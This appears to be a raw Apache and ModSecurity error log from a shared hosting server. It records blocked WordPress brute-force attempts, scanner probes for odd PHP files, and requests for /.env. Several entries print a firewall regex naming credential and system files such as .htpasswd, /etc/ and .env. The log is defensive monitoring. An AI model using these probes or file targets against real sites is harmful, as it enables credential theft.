[Tue May 26 13:00:23.834767 2026] [security2:error] [pid 470766:tid 470926] [client 66.249.64.41:57327] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMDujO_W1DqEcFHQ7jFAAAAB4"], referer: https://mosykay.com/prizes/124015561
[Tue May 26 13:00:24.522893 2026] [security2:error] [pid 470766:tid 470921] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMEOjO_W1DqEcFHQ7jLgAAABk"]
[Tue May 26 13:00:24.902146 2026] [security2:error] [pid 470766:tid 470986] [client 66.249.64.42:53022] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMD-jO_W1DqEcFHQ7jKAAAAFo"], referer: https://mosykay.com/prizes/124015561
[Tue May 26 13:00:25.830752 2026] [security2:error] [pid 470766:tid 470792] [remote 52.66.96.197:35074] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 197.96.66.52.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahVMEejO_W1DqEcFHQ7jTQAAWxk"]
[Tue May 26 13:00:26.508517 2026] [security2:error] [pid 470766:tid 470912] [client 14.228.205.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMEujO_W1DqEcFHQ7jWgAAABA"]
[Tue May 26 13:00:27.197383 2026] [security2:error] [pid 470766:tid 470956] [client 4.201.75.230:5337] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/goods.php"] [unique_id "ahVME-jO_W1DqEcFHQ7jewAAADw"]
[Tue May 26 13:00:27.522534 2026] [security2:error] [pid 470766:tid 470921] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVME-jO_W1DqEcFHQ7jdgAAABk"]
[Tue May 26 13:00:29.238078 2026] [core:error] [pid 470766:tid 470947] [client 194.164.107.5:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 13:00:29.238098 2026] [core:error] [pid 470766:tid 470947] [client 194.164.107.5:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 13:00:29.619435 2026] [security2:error] [pid 470766:tid 471006] [client 138.229.101.181:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVMFejO_W1DqEcFHQ7jyQAAAG4"], referer: https://www.anujtradingco.com/
[Tue May 26 13:00:30.045258 2026] [security2:error] [pid 470766:tid 471009] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMFejO_W1DqEcFHQ7jzQAAAHE"]
[Tue May 26 13:00:30.374454 2026] [security2:error] [pid 470766:tid 470923] [client 4.201.75.230:5637] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/class-t.api.php"] [unique_id "ahVMFujO_W1DqEcFHQ7j3gAAABs"]
[Tue May 26 13:00:31.237153 2026] [security2:error] [pid 470766:tid 471015] [client 138.229.101.181:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVMF-jO_W1DqEcFHQ7j5wAAAHc"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1418267&moderation-hash=9be30dabce180487f5f9cabe7d60938d
[Tue May 26 13:00:32.677486 2026] [security2:error] [pid 470766:tid 470905] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMGOjO_W1DqEcFHQ7j_QAAAAk"]
[Tue May 26 13:00:32.707774 2026] [security2:error] [pid 470766:tid 470958] [client 157.20.138.61:56293] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVMGOjO_W1DqEcFHQ7kBwAAAD4"]
[Tue May 26 13:00:32.707893 2026] [security2:error] [pid 470766:tid 470958] [client 157.20.138.61:56293] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVMGOjO_W1DqEcFHQ7kBwAAAD4"]
[Tue May 26 13:00:32.839412 2026] [security2:error] [pid 470766:tid 470982] [client 4.201.75.230:5645] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/sf.php"] [unique_id "ahVMGOjO_W1DqEcFHQ7kCQAAAFY"]
[Tue May 26 13:00:34.073286 2026] [security2:error] [pid 470766:tid 470978] [client 4.201.75.230:5335] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/kbfr.php"] [unique_id "ahVMGujO_W1DqEcFHQ7kIQAAAFI"]
[Tue May 26 13:00:35.042466 2026] [security2:error] [pid 470766:tid 471016] [client 138.229.101.181:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVMGujO_W1DqEcFHQ7kMwAAAHg"], referer: https://anujtradingco.com
[Tue May 26 13:00:35.589414 2026] [security2:error] [pid 470766:tid 470917] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMG-jO_W1DqEcFHQ7kPgAAABU"]
[Tue May 26 13:00:36.162196 2026] [proxy:error] [pid 470766:tid 470862] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:00:36.162259 2026] [proxy_http:error] [pid 470766:tid 470862] [remote 198.235.24.123:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:00:36.162864 2026] [proxy:error] [pid 470766:tid 470862] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:00:36.162898 2026] [proxy_http:error] [pid 470766:tid 470862] [remote 198.235.24.123:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:00:37.832998 2026] [security2:error] [pid 470766:tid 470899] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMHejO_W1DqEcFHQ7kbwAAAAM"]
[Tue May 26 13:00:38.205712 2026] [core:crit] [pid 470766:tid 471000] (13)Permission denied: [client 40.77.167.50:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 13:00:38.679790 2026] [security2:error] [pid 470766:tid 470900] [client 4.201.75.230:5359] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/chosen.php"] [unique_id "ahVMHujO_W1DqEcFHQ7kkQAAAAQ"]
[Tue May 26 13:00:39.565386 2026] [security2:error] [pid 470766:tid 470976] [client 176.65.139.232:58092] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.cercledepdy.in.svijaykumar.in"] [uri "/.env"] [unique_id "ahVMH-jO_W1DqEcFHQ7kpwAAAFA"]
[Tue May 26 13:00:40.394060 2026] [security2:error] [pid 470766:tid 470961] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMH-jO_W1DqEcFHQ7ksQAAAEE"]
[Tue May 26 13:00:42.632529 2026] [security2:error] [pid 470766:tid 470929] [client 176.65.139.238:44046] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.adityacreations.co.in.svijaykumar.in"] [uri "/.env"] [unique_id "ahVMIujO_W1DqEcFHQ7k9QAAACE"]
[Tue May 26 13:00:42.920567 2026] [security2:error] [pid 470766:tid 470928] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMIujO_W1DqEcFHQ7k8QAAACA"]
[Tue May 26 13:00:43.300598 2026] [security2:error] [pid 470766:tid 470905] [client 157.20.138.61:56652] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVMI-jO_W1DqEcFHQ7k_wAAAAk"]
[Tue May 26 13:00:43.300771 2026] [security2:error] [pid 470766:tid 470905] [client 157.20.138.61:56652] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVMI-jO_W1DqEcFHQ7k_wAAAAk"]
[Tue May 26 13:00:43.541000 2026] [security2:error] [pid 470766:tid 470949] [client 176.65.139.231:38912] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "adityacreations.co.in"] [uri "/.env"] [unique_id "ahVMI-jO_W1DqEcFHQ7lBgAAADU"]
[Tue May 26 13:00:45.543254 2026] [security2:error] [pid 470766:tid 470959] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMJejO_W1DqEcFHQ7lKQAAAD8"]
[Tue May 26 13:00:45.646464 2026] [security2:error] [pid 470766:tid 470995] [client 4.201.75.230:5638] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/defaults.php"] [unique_id "ahVMJejO_W1DqEcFHQ7lMwAAAGM"]
[Tue May 26 13:00:48.106997 2026] [security2:error] [pid 470766:tid 470994] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMJ-jO_W1DqEcFHQ7lVgAAAGI"]
[Tue May 26 13:00:48.461895 2026] [autoindex:error] [pid 470766:tid 470995] [client 205.210.31.40:0] AH01276: Cannot serve directory /home2/glorolle/public_html/glorodbalsa.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://glorodbalsa.com/
[Tue May 26 13:00:50.384547 2026] [security2:error] [pid 470766:tid 471019] [client 104.194.132.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVMKujO_W1DqEcFHQ7lmAAAAHs"], referer: https://www.anujtradingco.com/
[Tue May 26 13:00:50.763950 2026] [security2:error] [pid 470766:tid 470964] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMKujO_W1DqEcFHQ7lmQAAAEQ"]
[Tue May 26 13:00:51.193070 2026] [security2:error] [pid 470766:tid 470917] [client 104.194.132.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVMK-jO_W1DqEcFHQ7lpwAAABU"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1430896&moderation-hash=683babac959ef6b0812e0407a9e1141b
[Tue May 26 13:00:52.263606 2026] [security2:error] [pid 470766:tid 470948] [client 91.231.89.34:39093] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "yatirimfinans.cagmedya.com"] [uri "/index.php"] [unique_id "ahVMK-jO_W1DqEcFHQ7lrQAAADQ"]
[Tue May 26 13:00:52.935239 2026] [security2:error] [pid 470766:tid 470903] [client 113.179.110.92:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMLOjO_W1DqEcFHQ7lzwAAAAc"]
[Tue May 26 13:00:53.163964 2026] [security2:error] [pid 470766:tid 471011] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMLOjO_W1DqEcFHQ7l2AAAAHM"]
[Tue May 26 13:00:53.699288 2026] [security2:error] [pid 470766:tid 470965] [client 157.20.138.61:57009] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVMLejO_W1DqEcFHQ7l8gAAAEU"]
[Tue May 26 13:00:53.699427 2026] [security2:error] [pid 470766:tid 470965] [client 157.20.138.61:57009] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVMLejO_W1DqEcFHQ7l8gAAAEU"]
[Tue May 26 13:00:55.358268 2026] [security2:error] [pid 470766:tid 470780] [remote 88.198.165.116:57994] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 116.165.198.88.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "nicmaperu.com"] [uri "/wp-login.php"] [unique_id "ahVML-jO_W1DqEcFHQ7mGAAARA0"]
[Tue May 26 13:00:55.725077 2026] [security2:error] [pid 470766:tid 470993] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVML-jO_W1DqEcFHQ7mHgAAAGE"]
[Tue May 26 13:00:58.010880 2026] [security2:error] [pid 470766:tid 470985] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMMejO_W1DqEcFHQ7mWQAAAFk"]
[Tue May 26 13:00:58.326242 2026] [security2:error] [pid 470766:tid 470920] [client 4.201.75.230:5685] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/info.php"] [unique_id "ahVMMujO_W1DqEcFHQ7mYgAAABg"]
[Tue May 26 13:00:58.608869 2026] [security2:error] [pid 470766:tid 470974] [client 85.208.96.194:59544] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/event/list/"] [unique_id "ahVMMujO_W1DqEcFHQ7mcQAAAE4"]
[Tue May 26 13:00:58.609011 2026] [security2:error] [pid 470766:tid 470974] [client 85.208.96.194:59544] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/event/list/"] [unique_id "ahVMMujO_W1DqEcFHQ7mcQAAAE4"]
[Tue May 26 13:00:59.456445 2026] [core:crit] [pid 470766:tid 470926] (13)Permission denied: [client 66.249.70.137:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 13:01:00.480214 2026] [security2:error] [pid 470766:tid 470934] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMNOjO_W1DqEcFHQ7mlwAAACY"]
[Tue May 26 13:01:03.425154 2026] [security2:error] [pid 470766:tid 470932] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMN-jO_W1DqEcFHQ7m3AAAACQ"]
[Tue May 26 13:01:03.901039 2026] [security2:error] [pid 470766:tid 470784] [remote 178.104.90.233:48098] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.90.104.178.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "koneksi.com.co"] [uri "/wp-login.php"] [unique_id "ahVMN-jO_W1DqEcFHQ7m6gAAURE"]
[Tue May 26 13:01:04.247648 2026] [security2:error] [pid 470766:tid 471010] [client 157.20.138.61:57370] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVMOOjO_W1DqEcFHQ7m9wAAAHI"]
[Tue May 26 13:01:04.247790 2026] [security2:error] [pid 470766:tid 471010] [client 157.20.138.61:57370] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVMOOjO_W1DqEcFHQ7m9wAAAHI"]
[Tue May 26 13:01:04.403181 2026] [security2:error] [pid 470766:tid 470951] [client 4.201.75.230:5636] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/bless.php"] [unique_id "ahVMOOjO_W1DqEcFHQ7m-wAAADc"]
[Tue May 26 13:01:04.899816 2026] [security2:error] [pid 470766:tid 470820] [remote 57.141.2.14:36536] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 14.2.141.57.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahVMOOjO_W1DqEcFHQ7nBQAAfTU"]
[Tue May 26 13:01:05.739025 2026] [security2:error] [pid 470766:tid 470918] [client 4.201.75.230:5325] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/aa.php"] [unique_id "ahVMOejO_W1DqEcFHQ7nFgAAABY"]
[Tue May 26 13:01:07.247190 2026] [security2:error] [pid 470766:tid 470940] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMOujO_W1DqEcFHQ7nMAAAACw"]
[Tue May 26 13:01:07.705972 2026] [security2:error] [pid 470766:tid 471017] [client 4.201.75.230:5320] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/xmrlpc.php"] [unique_id "ahVMO-jO_W1DqEcFHQ7nSgAAAHk"]
[Tue May 26 13:01:08.301063 2026] [security2:error] [pid 470766:tid 470844] [remote 84.247.181.196:39176] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.181.247.84.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/wp-login.php"] [unique_id "ahVMPOjO_W1DqEcFHQ7nVAAAXE0"]
[Tue May 26 13:01:08.687954 2026] [security2:error] [pid 470766:tid 470916] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMPOjO_W1DqEcFHQ7nWgAAABQ"]
[Tue May 26 13:01:10.446565 2026] [security2:error] [pid 470766:tid 470896] [client 138.2.67.134:20816] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "bosscoirs.com"] [uri "/wp-comments-post.php"] [unique_id "ahVMPujO_W1DqEcFHQ7nhgAAAAA"]
